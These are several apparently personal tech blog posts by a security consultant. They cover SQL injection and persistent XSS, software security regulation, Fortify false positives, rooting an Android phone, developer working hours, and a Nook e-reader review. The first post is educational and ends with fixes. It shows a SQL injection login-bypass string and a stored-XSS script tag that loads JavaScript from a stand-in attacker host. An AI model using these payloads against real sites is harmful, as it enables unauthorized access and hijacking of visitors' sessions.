Eric Friese

A news article came through my twitter feed this morning about a new SQL Injection attack that has affected over 1M web sites:

http://www.net-security.org/secworld.php?id=12169

The attack inserts a malicious JavaScript tag into your page redirecting your users to the attacker’s site. This is probably just semantics, but they are missing another vulnerability here: persistent cross site scripting.

For those not aware of what SQL Injection is, this vulnerability occurs when unvalidated data is mixed with SQL logic to change the nature of a SQL query. That may be a little confusing, so here’s an example. Let’s say you have a login page that has two text boxes: one for a username and one for a password. When the user clicks submit, the information is put into a SQL query to see if the user is exists:

SELECT username FROM users WHERE username=’username’ AND password=’password’;

That looks pretty simple. If I put “eric” as the username and “1234″ as the password, the query looks like:

SELECT username FROM users WHERE username=’eric’ AND password=’1234′;

But what if I put “1234′ or ’1′=’1″ in the password field?

SELECT username FROM users WHERE username=’username’ AND password=’1234′ or ’1′=’1′;

For the non-SQL folks, that will retrieve all records in user table, because it’s asking “give me all rows where username=x and password=x or when 1=1″. 1 will always equal 1, so every row will be returned. In the case of this attack, attackers were able to insert a script tag into the database that eventually gets inserted into the HTML of the site. That is where persistent cross site scripting comes in.

Cross site scripting (or XSS for short) is where untrusted/unvalidated data is inserted into the page. There are three main types of XSS. but let’s focus on the persistent flavor. Persistent XSS occurs when data is retrieved from the database and inserted into the page without being validated and encoded. What’s the problem with that? This is always a hard pill for developers to swallow, but your database is not a trusted store for data. See the above example for why! 

To demonstrate persistent XSS, let’s say that the content of a blog article is stored in your application’s database. You want to post that article on your blog, so that data is pulled out of the database and inserted into the page. The article content looks like this:

The Auburn Tigers successfully routed the University of Virginia in the Chick-fil-a bowl! The Tigers will graduate very few seniors, so let’s hope for a better season next year.

Inserting that directly into a page doesn’t look bad, but if I use the SQL Injection attack above to edit the content of this article I could attack your users:

The Auburn Tigers successfully routed the University of Virginia in the Chick-fil-a bowl! The Tigers will graduate very few seniors, so let’s hope for a better season next year. <script src=”http://evilhacker.ru/youjustgothacked.js”>

When any user visits the page with the article, the JavaScript from evilhacker.ru will execute. This could do many things, but the most popular is redirecting to a malicious site where the attacker has control over the entire session. 

So the SQL Injection sets up the attack, but the persistent XSS is actually the vulnerability being exploited here. If the persistent XSS was fixed, then no redirect. SQL Injection is still a serious vulnerability (#1 on OWASP Top 10) that should be fixed immediately.

So how do you fix these vulnerabilities? I can write entire blog posts for these attacks…but here’s a quick explanation.

First, a word about input validation. NEVER trust data that comes from a source you don’t control. Data from a user, web service, database, external system, are outside the sphere of influence of the application, so VALIDATE the data. 

The best way to fix SQL Injection is to use parameterized queries. Parameterization is basically putting place holders into your SQL query, and the letting your platform insert the data for you. This will fix the vast majority of SQL Injection issues. Every platform is a little different, so try googling “parameterizing SQL queries” for your specific language to get an example.

For cross site scripting, the best fix is using encoding. If the data is being inserted into HTML, use HTML encoding. This will encode all of the malicious characters, not allowing them to be executed. Not all encoding libraries are good enough. Check out the OWASP ESAPI or the Anti-XSS Library from Microsoft if you’re using .NET.

Eric IT Security

I recently read an article quoting some “cyber security experts” discussing off-shoring and cyber security. Part of the article says that the government should not regulate software security because this will increase the cost of software and push more development over seas. There is some logic to this argument, but it’s the same excuses I hear from software developers who don’t want to fix their code. The argument being made is “I can give you crappy software at a price that is competative with off shored labor, or we can give you good code for a price that’s so large it will make you be okay with off shoring”. 

I’m not a fan of government regulation, but something has to give. For decades the general public has been acting as beta testers while software vendors work the kinks out of their software. The obvious downside is weekly security updates from Microsoft, malware that can take over a computer in a single click, and the building of zombie computer armies. While we are seeing some companies get better about writie secure code, it’s not industry wide. Security remains as a obstacle to getting to market quickly and an afterthought once in the market. This mentality will continue until something changes.

The Payment Card Industry Data Security Standard (PCI DSS) is a great example of self regulation. PCI DSS is not perfect by any means, ask Heartland Payment System, but it forced some companies to make security a priority. Even if the priority is just to pass an audit, this is still possitive yardage for their customers. The private and public sectors need something like PCI DSS. 

The answer could be self regulation. A consortium of software vendors agreeing to a security standard and then being able to put the groups logo on their software. Will this happen? Probably not. Humans usually don’t change until there is a large enough event to make the change happen. I would rather not wait around for that event, so government regulation (or the threat of government regulation) is the next best thing. 

A part of whatever regulation that comes about should include stipulations for supply chain risk management. Code coming from off shored development shops is sub par functionally speaking and even worse for security. If we are going to make software secure, it has to start at the requirements and be a part of design, coding, testing, and production. Who writes the code or where it is written should not matter. Developing software without security is writing crappy code plain and simple.

If this makes the cost of software rise, so be it. I would much rather pay more for software and not have to worry about clicking a link that will take over my computer, steal my bank password, and then make me spend hours on the phone trying to get my money back.

Eric Software

I’ve noticed my blog has been getting a lot of traffic lately regarding false positives and custom rules for Fortify. Full disclosure: I am a Fortify consultant. The number one complaint I hear about Fortify’s static analysis product (Fortify SCA) is that it produces too many false positives. To understand why this happens, some context is needed on Fortify’s design and purpose.

When the cavemen wrote code, they would use manual code review to look for bugs and security holes. There is a place for manual code review, but its costly and the effectiveness depends on the security education level of the reviewers. Manual code review usually leads to a high false negative rate, especially in complex applications. To make sure everyone is on the same page here, a false positive is where an issue is found that is really not an issue. A false negative is where an issue is missed, leaving a vulnerability in the code.

Fortify SCA was created to help automate the manual code review process. SCA looks through your source code and finds possible vulnerabilities…emphasis on possible. SCA errs on the side of reducing false negatives. The corollary to that is we produce more false positives. We do that because we would rather produce some false positives to avoid missing real issues. We do our best to understand the application, but let’s face it: static analysis is just one algorithm scanning another. There’s no way for ANY static analysis software to not produce false positives.

I also encounter many developers calling real vulnerabilities false positives because they don’t fully understand the finding. I recently received an email from a developer saying SCA found hundreds of persistent cross site scripting issues and that they were all false positives. He was convinced that since they do input validation, trusting the database was not a problem. We talked some about why the database is not a trusted source and he got the big picture.

For the most part, SCA does a decent job of reducing false positives. Many times the reviewers don’t understand the vulnerability or SCA’s criticality is too high for the given scenario. When it comes down to it, SCA is just a way of identifying potential issues. Its up to the reviewers to decide how they want to handle the output.

If you’re having problems with Fortify, send an email to support@fortify.com. Our support group is fantastic, so give that a go first. If you need help integrating Fortify into your SDLC, contact your Fortify rep to get a consultant on site.

Eric Software caveman, false positive, Fortify

So this article made my Friday! I tracked down the actual site where the sites are for sale. All joking aside. this is serious. These sites are trusted sites by a large amount of people; especially the Army sites. Those sites give attackers direct access to DoD internal networks. This just underscores the importance of application security and how much work we have ahead of us.

Eric IT Security application security

I bought a T-Mobile Vibrant (Samsun Galaxy S) in July and I’ve been really happy with it. The only down side was that it had Android 2.1 (Éclair), I was hoping for 2.2 (Froyo). Today, I read an article saying that Samsung was pressuring T-Mobile to not upgrade Vibrants over the air with Froyo so that people will upgrade to other Samsung phones. Oh, I don’t think so. I spent a lot of money on this phone and I will not let some no-talent-ass-clowns at Samsung/T-Mobile keep me from the Froyo goodness.

So, I rooted my phone and installed the Eugene Ginger Clone 2.2 ROM. It’s Froyo with a Ginger look and feel. Very, very, very nice. This was my first attempt at rooting my phone or using a ROM. Here’s how I did it:

1. Root the phone. I spent some time working with the SuperOneClick app from XDA, but couldn’t get it to work. For the Vibrant it would involve toggling USB Debugging multiple times and sacrificing a chicken. I found this post that worked like a champ…much easier. When the phone finished booting, I had the SuperUser app and everything worked great.

2. Backed Up Phone. Now that I had root, I used Titanium Backup from the Google Market to make a back up of the phone. This came in helpful for after I installed the ROM. I had to reinstall of my apps.

3. Install ROM Manager. To install a new ROM, you need to do a few things. First, download the ROM Manager app from the Market. After installing, install the Clockwork Recovery. Before doing this, make sure you have deleted the update.zip file from step one. If you don’t, then Clockwork Recovery will not be installed.

4. Download a ROM. At this point, you can use any ROM you want. I chose the Eugene Ginger Clone R2 ROM because I wanted Froyo and I thought the Ginter interface looked cool. You can download the ROM here. After downloading, connect your phone to a computer and transfer the ROM zip on to the internal storage.

5. Install the ROM. Open ROM Manager, and then choose install ROM from SD. Choosing the ROM you want to install, and then click go. It will automatically reboot your phone and the new ROM will install. Voila!

It took me a few hours to do this, but it would have been much quicker had I not bothered with the SuperOneClick app. Happy rooting! Oh, and I’m not responsible if you brick your phone…

Eric Software android vibrant root froyo ginger

I laughed my head off when I read this post on Slashdot this morning:

"My current boss asked me what I thought of asking all employees to work 10-11 hour days until the company is profitable. He read something from Joel Spolsky that said the best way to get new customers is to add new features. Anyways, we are a startup with almost a year live. None of the employees have ownership/stock and all are salary. Salaries are at normal industry rates. What should I say to him when we talk about this again?"

My first question would be, has this manager ever developed software? In my experience, developers write code in spurts. When writing code, I’m usually not going at it for 8 hours straight. Usually after my second cup of coffee I throw on the headphones and plow through some code. More coffee and some reflection about more important things (Auburn winning the National Championship for example), then plow through some more code. Honestly, I write more code when I don’t feel like I have to be writing code. There have been plenty of times I would be in bed, awake because I’ve got some implementation problem stuck in my head. I would get up, grab the laptop, and work when I didn’t have to because it was fun. That’s why we write code: it’s fun.

Making people sit at a desk for 10-11 hours straight just because the boss says so is not fun. If you want more out of your developers, find out what motivates them. Stock options, better perks at work, an Xbox in one of the spare cubes. If you create an atmosphere where people are happy and creative, then you can get good results out of them. It works for Google…

Usually the next argument is something like how much money Google has and that they can afford to let their employees prance around. There is some truth to this, but only some. If you’re going to drive your developers like slaves, give them some stock options. Make them feel like their work will pay off. If this guy wants to stick to just salary, then you will need to find other ways to motivate the developers.

Eric Software code, developers, stupid bosses

Recently saw an article about Estonia’s efforts to build a volunteer cyber army. Very cool idea. After being attacked and seeing how it affected their government, I could see why their citizens with security backgrounds would be willing to get involved. The article poses the questions of could this work in the US? The article leans toward no, but I would say yes.

It is true that many techie types are suspicious of government, but I believe you could find a core group of people who would be willing to volunteer. They could form a new reserve service under USCYBERCOM using same model they have for the reserves now: train one weekend a month and be ready if needed. One caveat, no required PT! That would likely be a deal breaker for many. Hacking is a couch sport, so being able to run 3 miles or do 100 pushups doesn’t help. Multitasking skills, such as attacking targets while eating Cheetos and watching Family Guy, would be a better fit.

On another note, I think this line of progress will lead to a large swell in the size of the security community. When software development was young, you couldn’t just pluck some guy off the street and have him writing code in a couple of weeks. Now, IDEs and frameworks have matured so much that you can teach monkeys how to write code. Over time, the tools used for attacking/protecting targets will get better. You will still need good people planning things, but you will see more worker bees with less experience/education in security actually doing the work.

Eric IT Security software security

I was reading an article this week in Fast Company called How an Army of Techies Is Taking on City Hall about a new non-profit called “Code For America”. It’s a similar model to Teach For America where graduating college seniors work as teachers in poor neighborhoods. The focus is writing software for municipal governments so that citizens get more bank for their tax bucks. This is a fantastic idea and I applaud their Founder, Jennifer Pahlka.

In the article they allude to sharing code between cities. Code sharing is always beneficial, but thinking about graduating seniors writing and and sharing code makes me think security nightmare. Only a hand full of colleges are doing a decent job of educating future developers on writing secure code. I hope that Mrs. Pahlka has some security expertise lined up…

Eric IT Security

Great post to bookmark…this guy has a great list of sites out there that you can practice on.

http://securitythoughts.wordpress.com/2010/03/22/vulnerable-web-applications-for-learning/

Hack away.

Eric IT Security

I few weeks ago I received an American Express gift card at work and I set out to blow the money. I had been thinking about getting an ebook reader for a few months, but didn’t want to spend the money because I’m not really an early adopter. Since this was someone else’s money, I deciding to take the plunge. I spent a few weeks weighing the different ebook reader offerings. I looked at the Kindle 2, the Kindle DX, the Sony readers, and the Barnes and Noble Nook. Ultimately I ended up buying the Nook by Barnes and Noble, and here’s why.

I was attracted the the Kindle early on, but about the time I was looking was when they took a bunch of books out of their ebook store in a power play against Macmillion Publishers. I don’t like that kind of instability, so that was an instant con. B&N is a brick and mortar store with more leverage, so I don’t think this type of crap will happen with them. I also didn’t like the fact that you had to buy books from Amazon in their proprietary format. This Apple like behavior was a real turn off (notice the Ipad was not considered). B&N has more ebooks, so this decision was easy for me.

Pros

• Runs on Android I’m a big fan of Google’s Android OS, so this was a big pro for me. Even though the Nook does not currently have apps, it likely will in the future. I can then write more apps to extend what I can do with my e-reader.
• Can Lend Books Something the Nook offers that other readers do not is the ability to lend books to other Nook users to read. I am constantly borrowing/loaning books from friends and family, so this is a cool feature. I should be able to loan it to more than one person and for more than two weeks, but 2 weeks is better than nothing. I know they want to make more money, but come on…
• Great Battery Life The battery life is not as good as the Kindle because of the color touch screen, but it has been fine for me. I usually get around 5 days of battery life with heavy usage.
• PDF Support The PDF support so far has been good. Granted the e-reader is not the best way to keep reference material, but reading PDFs has been fine. Even my technical books have looked good. More than likely I will still buy hardback technology books and read the rest on the nook.
• E-Pub Support E-Pub support is a huge pro. You can get E-Pub books in a lot of different places, so I don’t have to just get books from B&N.

Cons

• Advertising Why is this a con? I was in an airport last week and I had 5 people ask me “is that a Kindle?” I had to explain to them that it was a Nook from B&N. Amazon has gained the name recognition, so B&N needs to step it up a notch. I thing that the Nook is a superior reader, so they need to advertise that. It’s in everyone’s, Nook customers and B&N, best interest for the community to grow.
• Lack of Backing from B&N This is speculation on my part, but the Nook seems like an experiment by B&N and it does not yet have the full backing of the company. The reason why I say this is that it seems like they are not ordering enough Nook readers and the accessories to meet the demand. I decided to buy the Nook, but they were not available until early February so I had to wait. When I made the order, I also purchased the Neoprene sleeve that they offer. I lost that sleeve in the airport last week and needed to purchase another one. They are sold out and will not have more until April! If B&N wants to really push this product they need to get behind it. The lack of inventory is not encouraging. I’m envisioning a small room in B&N HQ with a few shelves of accessories and readers with a staff of 2 people for order fulfillment. I hope I’m wrong…

All in all, I love my Nook. I can download ebooks while on the road with the included AT&T wireless. I haven’t tried out the periodical subscriptions yet, but likely will soon. I still have some gift card money, so will be loading up the nook with more ebooks.

Eric Tech